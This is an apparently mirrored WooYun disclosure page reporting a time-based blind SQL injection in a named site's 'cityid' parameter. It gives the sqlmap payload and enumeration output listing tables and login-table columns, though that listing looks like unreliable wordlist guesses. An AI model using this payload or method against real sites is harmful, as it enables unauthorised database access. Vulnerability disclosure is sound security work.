乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-03-31: 厂商已经主动忽略漏洞,细节向公众公开
挖。没继续跑....
Place: POSTParameter: cityid Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cityid=350100' AND SLEEP(5) AND 'wSTi'='wSTi&cityname=%E7%A6%8F%E5B7%9E&page=1&lon=&lat=---[15:06:55] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.9, Nginxback-end DBMS: MySQL 5.0.11 [15:06:55] [INFO] fetched data logged to text files under 'C:\Users\Administratr\.sqlmap\output\www.ktvme.com'
Database: kmQ[35 tables]+-------------------------+| Collection || ConsultantsTable || DEPENDENT || ITEM || SALGRADE || Domain || account || action_element || chart || chip_layout || form_definition_version || form_error || friend || friend_statuses || items_template || jiveID || jivePrivacyList || lending || login || order_line || organization || part || person || phpbb_ranks || product || property || questions || request || term || userSession || vcd_MetaDataTypes || vcd_PornCategories || vcd_PornStudios || watchlist || webcal_view |+-------------------------+
Database: kmQTable: login[72 columns]+---------------------+---------+| Column | Type |+---------------------+---------+| account_id | numeric || admin_pass | numeric || adminlogin | numeric || akses | numeric || app_utente_e | numeric || block_id | numeric || brand_id | numeric || bs_setting | numeric || bsu_id | numeric || bvo_id | numeric || cod_dep | numeric || compte | numeric || db_value | numeric || disablepostctrl | numeric || discount_id | numeric || eno | numeric || fee | numeric || file5 | numeric || ft_id | numeric || gender | numeric || geshi | numeric || grupy | numeric || guy | numeric || id_attivita | numeric || id_message | numeric || ishtml | numeric || job_title | numeric || logenabled | numeric || login_pass | numeric || losung | numeric || membre | numeric || mo | numeric || monmotdepasse | numeric || moscode | numeric || mospaging | numeric || mot_de_passe_bdd | numeric || newsfeeds | numeric || o | numeric || object_sub_class_id | numeric || ostdate | numeric || params | numeric || passw | numeric || pingback_id | numeric || plugin_id | numeric || po_id | numeric || prg_movimento | numeric || prih | numeric || product_version | numeric || psw | numeric || realiz | numeric || search_id | numeric || send | numeric || situacao | numeric || special | numeric || structure_id | numeric || tag_id | numeric || tecla | numeric || temp_password | numeric || temppass | numeric || topicid | numeric || u56fd | numeric || u661f | numeric || u6cf0 | numeric || un | numeric || userinfo_id | numeric || usr_n | numeric || v_id | numeric || vendor_id | numeric || views | numeric || xdecisao | numeric || xequipe | numeric || yahoo | numeric |+---------------------+---------+
你懂..
未能联系到厂商或者厂商积极拒绝